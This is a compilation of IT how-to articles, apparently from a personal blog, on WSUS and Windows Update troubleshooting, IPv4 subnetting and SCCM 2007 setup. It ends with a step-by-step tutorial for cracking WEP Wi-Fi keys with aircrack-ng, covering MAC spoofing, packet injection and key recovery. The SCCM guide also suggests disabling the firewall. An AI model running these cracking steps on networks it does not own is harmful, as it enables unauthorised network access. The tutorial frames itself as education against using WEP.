Windows Client(s) not ‘appearing’ in WSUS

KB ID 0000591 

Problem

Before you start troubleshooting clients, how long have you waited? I usually setup and configure WSUS up at the start of a job, then leave it alone for a few DAYS, before I start worrying.

Here are the steps I usually follow to get the machines listed in the WSUS management console.

Solution

Before doing anything further, simply try running the following two PowerShell commands, (on the problem client,) and then waiting for a few hours;

[box]

$updateSession = new-object -com "Microsoft.Update.Session"; $updates=$updateSession.CreateupdateSearcher().Search($criteria).Updates

wuauclt /reportnow

[/box]

 

 

1. Assuming you are deploying your WSUS settings by GPO, make sure the machine in question is actually trying to apply the policy, you can do this by running rsop.msc like so:

Or by running gpresult /R from command line

Note: If you cannot see Computer Policy / Computer Settings, i.e. you can only see user settings, then you are probably not running the command window as ‘Administrator’ (Locate cmd.exe > right click > Run as Administrator).

2. If you are enforcing by GPO, or directly via registry edit, your next step is to check that the registry entries exist. Start > In the Search/Run box type regedit {Enter}. Navigate to:

[box]HKEY_LOCAL_MACHINE > SOFTWARE > Policies > Microsoft > Windows > WindowsUpdate[/box]

3. Start > In the Search/Run box type services.msc {enter} Locate the Windows Update service and ensure it is running.

4. Then locate the Background Intelligent Transfer Service and make sure that’s also running.

5. To make sure the client can see the WSUS website, open a browser window, and navigate to http://{name-of-the-wsus-server}/iuident.cab and make sure you can open/download the file.

6. If all the above is OK, you can try forcing a registration with the following command;

[box]wuauclt /detectnow[/box]

7. All update events are being logged, you can find the log at c:windowsWindowsUpdate open the file with notepad.

8. Scroll all the way to the end, then work upwards looking for errors.

9. Sometimes if you image a machine (Or clone a VM) it keeps it’s unique update ID, if this happens then the first machine with this ID to register gets listed, and all the rest do not. To find out if this is your problem, locate and stop the Windows update service on an affected client.

10. Open the registry Editor and navigate to:

[box]HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > WindowsUpdate[/box]

Locate and delete the SusClientId entry.

11. Restart the Windows Update service and run the following two commands:

[box]wuauclt /resetauthorization /detectnow<br /> wuauclt /reportnow [/box]

Update 16/06/15

Received via Email from Patrick Mauger:

You can add an incorrect binding in IIS to the site WSUS Administration.

You need to add a binding for port 80, because the only ports configured are 8530 and 8531.

Related Articles, References, Credits, or External Links

Windows Server Update Services – Install and Configure (2008 R2)

WSUS Install Error – ‘The update could not be found. There may be a network connection issue.

Message ID 6600: sms wsus configuration manager failed to configure upstream server

WSUS Install Error on Windows Server 2008 R2

Windows Update Fails

KB ID 0000359

Problem

There are a LOT of different reasons for Windows Updates to fail, I can’t cover every eventuality, but there a a few common steps to try.

Solution

1. As soon as the updates fail you should get an Error Message, that should point you in the right direction.


Update Error Code 80200011

2. If you error code matches one of these…

Code Error Description
0x80070002
ERROR_FILE_NOT_FOUND
The system cannot find the file specified.
0x8007000D
ERROR_INVALID_DATA
The data is invalid.
0x800F081F
CBS_E_SOURCE_MISSING
The source for the package or file not found.
0x80073712
ERROR_SXS_COMPONENT_STORE_CORRUPT
The component store is in an inconsistent state.
0x800736CC
ERROR_SXS_FILE_HASH_MISMATCH
A component’s file does not match the verification information present in the component manifest.
0x800705B9
ERROR_XML_PARSE_ERROR
Unable to parse the requested XML data.
0x80070246
ERROR_ILLEGAL_CHARACTER
An invalid character was encountered.
0x8007370D
ERROR_SXS_IDENTITY_PARSE_ERROR
An identity string is malformed.
0x8007370B
ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME
The name of an attribute in an identity is not within the valid range.
0x8007370A
ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE
The value of an attribute in an identity is not within the valid range.
0x80070057
ERROR_INVALID_PARAMETER
The parameter is incorrect.
0x800B0100
TRUST_E_NOSIGNATURE
No signature was present in the subject.
0x80092003
CRYPT_E_FILE_ERROR
An error occurred while Windows Update reads or writes to a file.
0x800B0101
CERT_E_EXPIRED
A required certificate is not within its validity period when verifying against the current system clock or the time stamp in the signed file.
0x8007371B
ERROR_SXS_TRANSACTION_CLOSURE_INCOMPLETE
One or more required members of the transaction are not present.
0x80070490
ERROR_NOT_FOUND
Windows could not search for new updates.

Then run the System Update Readiness Tool and then retry Windows Update.

Operating system Download
All supported x86-based versions of Windows Vista Download
All supported x64-based versions of Windows Vista Download
All supported x86-based versions of Windows Server 2008 Download
All supported x64-based versions of Windows Server 2008 Download
All supported IA-64-based versions of Windows Server 2008 Download
All supported x86-based versions of Windows 7 Download
All supported x64-based versions of Windows 7 Download
All supported x64-based versions of Windows Server 2008 R2 Download
All supported IA-64-based versions of Windows Server 2008 R2 Download

3. Otherwise Start > Run (or for Vista/Windows 7 or 2008 Type in the search box) > services msc {enter}.

4. First make sure the following three services are present and have started,

Windows Update
Background Intelligent Transfer Service
Cryptographic Services

If any are not running right click > Start. If they are all present and running then > Locate the “Windows Update” service> Right click it > Stop.

5. Open Windows Explorer and navigate to C:Windows > Locate the SoftwareDistribution folder> Rename it to UpdateOLD.

6. Go back to the service “Windows Update” service you stopped in step 4 and restart it > Then retry Windows Update.

7. If your still not working, then manually reset the Windows Update components using the BITS repair tool, or doing it manually, for instructions CLCK HERE.

8. You can also try using the Fix WU Utility (Written by Ramesh Kumar from TheWindowsClub ).

Note: If all else fails try using the Firegen Windows update Log Analyzer.

 

Related Articles, References, Credits, or External Links

NA

IP (v4) Networking Crib Sheet

KB ID 0000832

Problem

You would think by now I would have committed a lot of this to memory, but seeing as I always have to visit my own Subnet Calculator, I thought it was about time I had a ‘handy reference’. Feel free to copy and print it off.

Solution

Click for larger image.

Related Articles, References, Credits, or External Links

Online Subnet Calculator IPv4 and IPv6

Install SCCM 2007 on Windows Server 2008 R2 – Step by Step

KB ID 0000297

Problem

I had to work out how to do this for a client, and as is my modus operandi, I’ll try and save you some of the pain I endured,

Products Used

System Center Configuration Manager 2007 SP2 Windows Server 2008 R2 SQL 2008 R2 (At time of writing neither officially supported or not supported on SCCM)

Note: I was originally going to use SQL 2005 – hence the reason the SQL servers name is SCCM-SQL2005, however I bit the bullet and used SQL 2008 R2 instead.

Solution

Step 1: SCCM Domain pre install work.

1. Create two groups in Active Directory.

a. sccm administrator group SCCM-ADMIN b. sql administrator group SQL-ADMIN

2. Add both groups to the Domain Admin’s group.

3. Create two new users: sccmadmin and sqladmin.

4. Add sccmadmin to SCCM-ADMIN group and add sqladmin to SQL-ADMIN group.

Step 2: SCCM Pre requisites

1. Add the IIS (Web Server Role).

2. Add the following IIS Role Services:

a. HTTP redirection. b. ASP.Net

c. Windows Authentication. d. IIS6 Metabase compatibility. e. IIS6 WMI compatibility.

3. Add the following “server Features”:

a. Background Intelligent Transfer Service. b. Remote Differential Compression.

4. If you are NOT running Windows Server 2008 R2 Download and install WebDav (already included in Windows Server 2008 R2). If you are running R2 skip to the next step.

5. Server Manager > Roles > Web Server (IIS) > Add Role Services > WebDAV Publishing > Next > Close.

6. To enable WebDav > Start > Administrative Tools > Internet Information Services (IIS) Manager > Expand {server name} > Sites > Default Web Site > WebDav Authoring Rules.

7. Select Enable WebDav (On the right hand side).

8. Select add authoring Rule > All Content > All Users > Permissions > Read > OK.

9. Select the rule you have just created > WebDav Settings.

10. Change “Allow Anonymous Properties Queries” to True > Change “Allow Custom Properties” to False > Change “Allow Property Query with Infinite Depth” to True > Change “Allow hidden files to be listed” to True > Apply.

11. WSUS needs to installed on the SCCM server – Note Server 2008 R2 needs (WSUS Server Update Services 3.0 SP2). If you try and install SP 1 you will see this error.

12. From the WSUS installation choose “Full server installation” > DO NOT accept the default “Use the existing IIS Default Web site” > Use “”Create a Windows Server Update Services 3.0 SP2 Web site” (Note: this will use port TCP 8530 by default).

Step 3: SCCM Install SQL Server.

1. From the SQL install media run setup.exe > Installation > “New Installation or add features to an existing Installation” > OK.

2. Enter product Key if applicable > Next > “I accept…” > Next > Install > Next > Next.

3. Tick Database Engine Services > Tick Management Tools (Basic and Complete) > Next.

4. Next > Accept the defaults > Next > Next.

5. On the Server configuration Page > Select “Use the same account for all SQL Server services > Select the User you created originally (sqladmin) > Set the SQL Server Agent and SQL Server Database Engine Startup type to “Automatic” > Next.

6. Accept “Windows Authentication” > Add in your SCCM-ADMIN group and SQL-ADMIN group > Next > Next > Next > Install.

7. When it’s completed click close.

Step 4: Prepare Active Directory for SCCM

1. Extend the schema > From the install media > SMSSETUP > BIN > 1386 > extadsch.exe

2. Check the above was successful by opening the c:extADsch.txt file it should say “”successfully extended the Active Directory Schema”.

3. We now need to create some active directory objects go to a domain controller > Start > Administrative tools > ADSI Edit > Action > connect to > leave everything on its defaults > OK.

4. Expand the Default naming context > Expand your domain name > Right click “system” > New > Object > Container > Next.

5. Call it “System Management” > Next > Finish > Close ADSI Edit.

6. Still on the domain controller > Start > dsa.msc {enter} > View > Advanced.

7. Expand “system” > Locate the container you created “System Management” > right click it and select properties > Security Tab > Add > Object Types > Tick Computers > OK.

8. Click Advanced > Find Now > Locate and add the SCCM-ADMIN group you created earlier > Also add the SCCM Server itself > OK.

9. Grant allow “Full Control” to both the SCCM admin group and the SCCMserver.

10. Now click advanced > Select the SCCM-ADMIN group > Edit.

11. Change the “Apply to” section from “This object only” to “This object and all descendant objects” > OK > Apply > OK.

12. Repeat the above for the SCCM-Server object.

Step 5: Install SCCM

1. Log on as the sccadmin user.

2. From within the SCCM setup media run splash.hta > Run the Pre requisite checker > Enter the SQL Server name > SCCM server name and the FQDN of the SCCM server > OK.

3. Note If you cannot talk to the SQL server then check that the Windows firewall is not blocking you (on the SQL server Start > run > firewall.cpl > Turn it off).

4. All being well it should say “All required pre requisite tests have completed successfully” > OK.

5. Re-run Splash.hta > This time choose > Install configuration Manager 2007 SP2 > Next > “Install Configuration Manager site Server > Next.

6. Tick “I accept these License terms > Next > Custom Install > Next > Primary Site > Next > Next > enter unlock code is applicable > Next > Accept/change the install directory > Next > Enter a Site code and friendly name > Next.

DO NOT ever try and change this code and don’t forget it!!

7. Change the Site mode to “Configuration Manager Mixed Mode” (Native mode requires certificate services and considerably more work). > Next.

8. Accept the defaults (everything except NAP) > Next.

9. Enter your SQL server name > Next > Next > Next > Next > Next.

10. Select a location to install the updates to > Next.

11. Updates will download this may take some time > when finished it should say it was successful > OK > Next.

12. It will run the pre requisite check again > when finished click begin install.

13. When finished click Next > Finish.

14.Now you need to send out the clients and configure SCCM, I’ll cover that in a later article.

Related Articles, References, Credits, or External Links

SCCM 2007 Initial Setup and Configuration

SCCM OSD Capture a Windows 7 Reference Machine

Hacking Wireless WEP Keys with BackTrack and Aircrack-ng

KB ID 0000633

Problem

Disclaimer: This article is for educational purposes only. Having the ability to pick a lock does not make you a thief. The main thing to take away from this article is, “DONT secure your wireless network with WEP“.

WEP, has been around for a long time now, its limited to an alpha numeric password, 0-9 and A-F (because its in hexadecimal), the password can be 40, 64 or 126 bits long. The flaw is, each bit of information is encrypted with the SAME key, If you can get enough packets (24 bit long packets called IV’s), you can mathematically work out what the key is.

Solution

To do this I’m going to use BackTrack 5 (R1) installed in a Virtual machine, the Network card I’m using is an ALFA AWUS036NH USB wireless card, I’m using this card because the Ralink RT2878/3078 chipset that’s inside it just works with airmon-ng, without the need to patch drivers or mess about.

Note: If your wireless card does not work please do not email me go the the Aircrack-ng forums.

1. After I’ve plugged the wireless card into the host machine, I’m going to present it to the virtual machine. VM > Removable Devices > Ralink 802.11 n WLAN > Connect.

2. To make sure BackTrack can see the card issue the following command;

[box] airmon-ng [/box]

Take note of the interface name (in the example below it’s wlan0). Then to change the MAC address of the card we are going to ‘spoof’ a false MAC address of 00:11:22:33:44:55 with the following commands. (Note: Your interface may not be wlan0, change accordingly);

[box]airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan[/box]

Then to scan and see what networks the card can see issue the following command

[box] airodump-ng wlan0 [/box]

3. Airodump will continue to scan until you press CTRL+C. When you see the target network, take a note of its BSSID and its channel number. My target below is called PeteNetLive and the bssid is 00:16:B6:B4:66:46 and its on channel 1).

4. Now scan the target network with the following command;

[box]SYNTAX
airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)
EXAMPLE
airodump-ng -c 1 -w PeteNetLive –bssid 00:16:B6:B4:66:46 wlan0[/box]

5. Leave that running, and open a new terminal window, execute the following command in the new window;

[box]SYNTAX
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
EXAMPLE
aireplay-ng -1 0 -a 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 -e PeteNetLive wlan0[/box]

YOU NEED it to say ‘Authentication successful‘.

6. To throw some traffic across the network issue the following command;

[box]SYNTAX
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
EXAMPLE
aireplay-ng -3 -b 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 wlan0[/box]

Note: ‘-3’ denotes a client attack, if your data packets do not rise (you will understand in a minute), then try with ‘-4’ instead.

7. Back in the original terminal window the Data count should start to rise, do nothing further until its over 10,000 (that’s 10,000 IVs captured).

Reality Check!: In most tutorials (including my video above) this is a nice painless process, it relies on there being a decent quality signal, the router/access point not crashing because you are ‘battering’ it, and there being lots of healthy traffic around. You can get enough data packets without the ‘aireplay-ng -3’ command, but it will take a lot longer. You can stop and start the forcing of traffic by pressing CTRL+C, and then executing the command again (it just appends the data to the capture file). In this example I used about five attempts (the router froze and needed to be rebooted). So this is not a quick process. Someone passively attacking your wireless will need lot of patience. This took about an hour and I was right next to the router, and I rebooted it every time it locked up, (which I saw because the Data figure suddenly stopped rising).

8. In the example below I’m now over 10,000 IV’s captured, and I’ve stopped forcing traffic (CTRL+C).

9. By default your capture will be in your home folder, and it will be called filename-01.cap (where filename is the name you used in step 4).

10. To crack the key execute the following command;

[box]SYNTAX
aircrack-ng -b (bssid) (file name-01.cap)
EXAMPLE
aircrack-ng -b 00:16:B6:B4:66:46 PeteNetLive-01.cap[/box]

11. It will display the WEP key with colons in it, remove them,

DC:B4:2F:63:C9 = DCB42F63C9 <-Heres the WEP key!

12. And to prove it’s correct.

13. And to prove I didn’t just print a sticker, heres the web console of the router.

Related Articles, References, Credits, or External Links

Installing the BackTrack Linux VMware Virtual Machine

Windows – Export / Recover WEP and WPA Wireless Keys